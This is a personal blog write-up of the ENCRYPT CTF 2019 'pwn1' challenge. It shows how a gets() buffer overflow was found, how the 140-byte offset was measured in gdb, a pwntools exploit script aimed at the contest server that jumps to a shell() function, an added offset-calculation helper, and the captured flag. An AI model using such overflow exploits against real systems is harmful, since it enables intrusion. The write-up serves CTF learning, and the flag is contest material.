Unleash the Beast!

I use this blog for notes on CTFs and the like.

ENCRYPT CTF 2019 - pwn1(Pwn 50)


First of all, I decompiled the binary with Ghidra!!

- The main() function has a buffer overflow vulnerability (there is no length check, and it reads input with gets() and writes with puts()).

- The shell() function calls "/bin/sh".

So the tactic is to overwrite the return address with the address of shell() -> 0x80484b3


Step 1: Identify the position of the return address.

  -> Run pwn1 under gdb and enter the following string as the name.

      Tell me your name: 0123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899

      -> Segmentation fault occurred at 0x36373537

   Read as little-endian ASCII, 0x36373537 is "7576", which sits 140 characters into the input. So the saved return address is reached after 140 bytes of padding.


Step 2: Write the script to win.

       The following is my script.

# coding:utf-8
from pwn import remote, p32

host = "104.154.106.182"
port = 2345

r = remote(host, port)

# Wait for the prompt (bytes, so this also works on Python 3 pwntools)
r.recvuntil(b"Tell me your name: ")

code = b"A" * 140  # dummy padding up to the saved return address
code += p32(0x80484b3)  # address of shell(), packed little-endian
print(code)
r.sendline(code)

r.interactive()
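The offset calculation behind Step 1, as an added example that is not the author's code: it rebuilds the name string typed into gdb, decodes the faulting address as the little-endian bytes that overwrote the saved return address, recovers the 140-byte offset, and then builds the same payload as the script above using struct instead of pwntools. The pattern generator and the function names are my own.

```python
import struct


def name_pattern(count=100):
    """Rebuild the input typed into gdb: the decimal numbers 0..count-1 concatenated."""
    return "".join(str(i) for i in range(count)).encode()


def crash_offset(pattern, fault_addr):
    """Return the offset in `pattern` of the 4 bytes that ended up in EIP.

    On 32-bit x86 the saved return address is stored little-endian, so the
    address gdb reports for the crash is the 4 overwriting input bytes in
    reverse order. Packing it as "<I" gives them back in input order.
    """
    needle = struct.pack("<I", fault_addr)
    off = pattern.find(needle)
    if off < 0:
        raise ValueError("fault address is not made of pattern bytes")
    # A pattern that repeats the 4 bytes would make the offset ambiguous
    if pattern.find(needle, off + 1) != -1:
        raise ValueError("pattern is ambiguous; offset not unique")
    return off


def build_payload(offset, target):
    """Padding up to the saved return address, followed by `target` little-endian."""
    return b"A" * offset + struct.pack("<I", target)


if __name__ == "__main__":
    pattern = name_pattern()
    # 0x36373537 is the faulting address from the write-up's gdb session
    off = crash_offset(pattern, 0x36373537)
    print("bytes in EIP:", struct.pack("<I", 0x36373537))  # b'7576'
    print("offset:", off)  # 140
    print("payload:", build_payload(off, 0x80484B3))
```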


I got the following result.


flag is: encryptCTF{Buff3R_0v3rfl0W5_4r3_345Y}


This is the first time I got a pwn flag since joining my team.

Congrats to me ^^